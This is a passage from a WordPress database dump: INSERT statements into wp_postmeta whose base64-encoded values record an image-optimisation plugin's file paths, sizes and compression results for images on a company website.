icmVkdWN0aW9uIjo2MzIsInRpbWUiOjE0ODM1NjgyMDcsImlkIjoxNjAwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtMi04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtMi04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tNjQtMi04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MTM5MywidGltZSI6MTQ4MzU2ODIxMSwiaWQiOjE2MDB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC0yLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC0yLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy02NC0yLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoxMzEzLCJ0aW1lIjoxNDgzNTY4MjE0LCJpZCI6MTYwMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY0LTItMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC0yLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTY0LTItMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6NTc1MywidGltZSI6MTQ4MzU2ODIxOSwiaWQiOjE2MDB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC0yLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC0yLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy02NC0yLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1NjAsInRpbWUiOjE0ODM1NjgyMjIsImlkIjoxNjAwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtMi0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtMi0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tNjQtMi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDY2LCJ0aW1lIjoxNDgzNTY4MjI2LCJpZCI6MTYwMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY0LTItMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY0LTItMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTY0LTItMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjUwNCwidGltZSI6MTQ4MzU2ODIyOSwiaWQiOjE2MDB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC0yLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC0yLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy02NC0yLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxMTAwLCJ0aW1lIjoxNDgzNTY4MjMyLCJpZCI6MTYwMH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtMi0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtMi0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tNjQtMi0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NTA1LCJ0aW1lIjoxNDgzNTY4MjM2LCJpZCI6MTYwMH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtMi0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtMi0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tNjQtMi0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NjQ0LCJ0aW1lIjoxNDgzNTY4MjQwLCJpZCI6MTYwMH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtMi0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtMi0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tNjQtMi0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NjU3LCJ0aW1lIjoxNDgzNTY4MjQ0LCJpZCI6MTYwMH1d'); 
INSERT INTO `wp_postmeta` VALUES (29390, 1588, 'wpfc_optimisation_reduction', '598'); 
INSERT INTO `wp_postmeta` VALUES (29391, 1588, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZmx1b3JvLWV4dHJlbWUtbG9nby1lMTQ3Mzc3MTQwMjQ3OC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2ZsdW9yby1leHRyZW1lLWxvZ28tZTE0NzM3NzE0MDI0NzguanBnIiwid2lkdGgiOjI0MCwiaGVpZ2h0Ijo5OSwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2ZsdW9yby1leHRyZW1lLWxvZ28tZTE0NzM3NzE0MDI0NzguanBnIiwicmVkdWN0aW9uIjo1OTYsInRpbWUiOjE0ODM1NjgyNTAsImlkIjoiMTU4OCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZmx1b3JvLWV4dHJlbWUtbG9nby1lMTQ3Mzc3MTQwMjQ3OC0yMDB4OTkuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0Ijo5OSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9mbHVvcm8tZXh0cmVtZS1sb2dvLWUxNDczNzcxNDAyNDc4LTIwMHg5OS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9mbHVvcm8tZXh0cmVtZS1sb2dvLWUxNDczNzcxNDAyNDc4LTIwMHg5OS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjgyNTIsImlkIjoxNTg4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2ZsdW9yby1leHRyZW1lLWxvZ28tZTE0NzM3NzE0MDI0NzgtMjI1eDk5LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6OTksInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZmx1b3JvLWV4dHJlbWUtbG9nby1lMTQ3Mzc3MTQwMjQ3OC0yMjV4OTkuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvZmx1b3JvLWV4dHJlbWUtbG9nby1lMTQ3Mzc3MTQwMjQ3OC0yMjV4OTkuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4MjU0LCJpZCI6MTU4OH1d'); 
INSERT INTO `wp_postmeta` VALUES (29392, 1586, 'wpfc_optimisation_reduction', '613'); 
INSERT INTO `wp_postmeta` VALUES (29393, 1586, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLWxvZ28tMS1lMTQ3Mzc3MDc5NzIzMy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi1sb2dvLTEtZTE0NzM3NzA3OTcyMzMuanBnIiwid2lkdGgiOjI0MCwiaGVpZ2h0Ijo5OSwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL29wdGVvbi1sb2dvLTEtZTE0NzM3NzA3OTcyMzMuanBnIiwicmVkdWN0aW9uIjo2MTEsInRpbWUiOjE0ODM1NjgyNjAsImlkIjoiMTU4NiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLWxvZ28tMS1lMTQ3Mzc3MDc5NzIzMy0yMDB4OTkuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0Ijo5OSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9vcHRlb24tbG9nby0xLWUxNDczNzcwNzk3MjMzLTIwMHg5OS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9vcHRlb24tbG9nby0xLWUxNDczNzcwNzk3MjMzLTIwMHg5OS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjgyNjIsImlkIjoxNTg2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi1sb2dvLTEtZTE0NzM3NzA3OTcyMzMtMjI1eDk5LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6OTksInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLWxvZ28tMS1lMTQ3Mzc3MDc5NzIzMy0yMjV4OTkuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvb3B0ZW9uLWxvZ28tMS1lMTQ3Mzc3MDc5NzIzMy0yMjV4OTkuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4MjY0LCJpZCI6MTU4Nn1d'); 
INSERT INTO `wp_postmeta` VALUES (29394, 1580, 'wpfc_optimisation_reduction', '674'); 
INSERT INTO `wp_postmeta` VALUES (29395, 1580, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWxvZ28tMS1lMTQ3Mzc2OTk5NTQyNi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1sb2dvLTEtZTE0NzM3Njk5OTU0MjYuanBnIiwid2lkdGgiOjI0MCwiaGVpZ2h0Ijo5OSwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2hleGlvbi1sb2dvLTEtZTE0NzM3Njk5OTU0MjYuanBnIiwicmVkdWN0aW9uIjo2NzIsInRpbWUiOjE0ODM1NjgyNzEsImlkIjoiMTU4MCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWxvZ28tMS1lMTQ3Mzc2OTk5NTQyNi0yMDB4OTkuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0Ijo5OSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24tbG9nby0xLWUxNDczNzY5OTk1NDI2LTIwMHg5OS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9oZXhpb24tbG9nby0xLWUxNDczNzY5OTk1NDI2LTIwMHg5OS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjgyNzIsImlkIjoxNTgwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1sb2dvLTEtZTE0NzM3Njk5OTU0MjYtMjI1eDk5LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6OTksInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWxvZ28tMS1lMTQ3Mzc2OTk5NTQyNi0yMjV4OTkuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvaGV4aW9uLWxvZ28tMS1lMTQ3Mzc2OTk5NTQyNi0yMjV4OTkuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4Mjc0LCJpZCI6MTU4MH1d'); 
INSERT INTO `wp_postmeta` VALUES (29396, 1576, 'wpfc_optimisation_reduction', '816'); 
INSERT INTO `wp_postmeta` VALUES (29397, 1576, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uX2dyZXktZTE0NzM3MzIxMDE3MzguanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb25fZ3JleS1lMTQ3MzczMjEwMTczOC5qcGciLCJ3aWR0aCI6MjQwLCJoZWlnaHQiOjk5LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvaGV4aW9uX2dyZXktZTE0NzM3MzIxMDE3MzguanBnIiwicmVkdWN0aW9uIjo4MTQsInRpbWUiOjE0ODM1NjgyODEsImlkIjoiMTU3NiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uX2dyZXktZTE0NzM3MzIxMDE3MzgtMjAweDk5LmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6OTksInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uX2dyZXktZTE0NzM3MzIxMDE3MzgtMjAweDk5LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2hleGlvbl9ncmV5LWUxNDczNzMyMTAxNzM4LTIwMHg5OS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjgyODMsImlkIjoxNTc2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbl9ncmV5LWUxNDczNzMyMTAxNzM4LTIyNXg5OS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjk5LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbl9ncmV5LWUxNDczNzMyMTAxNzM4LTIyNXg5OS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9oZXhpb25fZ3JleS1lMTQ3MzczMjEwMTczOC0yMjV4OTkuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4Mjg1LCJpZCI6MTU3Nn1d'); 
INSERT INTO `wp_postmeta` VALUES (29398, 1574, 'wpfc_optimisation_reduction', '825'); 
INSERT INTO `wp_postmeta` VALUES (29399, 1574, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94Z3JleS1lMTQ3MzczMDk4NTE0OC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveGdyZXktZTE0NzM3MzA5ODUxNDguanBnIiwid2lkdGgiOjI3NSwiaGVpZ2h0IjoxMTQsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3hncmV5LWUxNDczNzMwOTg1MTQ4LmpwZyIsInJlZHVjdGlvbiI6ODIyLCJ0aW1lIjoxNDgzNTY4MjkyLCJpZCI6IjE1NzQifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveGdyZXktZTE0NzM3MzA5ODUxNDgtMjUweDExNC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjExNCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3hncmV5LWUxNDczNzMwOTg1MTQ4LTI1MHgxMTQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94Z3JleS1lMTQ3MzczMDk4NTE0OC0yNTB4MTE0LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2ODI5NCwiaWQiOjE1NzR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94Z3JleS1lMTQ3MzczMDk4NTE0OC0yMDB4MTE0LmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MTE0LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveGdyZXktZTE0NzM3MzA5ODUxNDgtMjAweDExNC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3hncmV5LWUxNDczNzMwOTg1MTQ4LTIwMHgxMTQuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4Mjk2LCJpZCI6MTU3NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3hncmV5LWUxNDczNzMwOTg1MTQ4L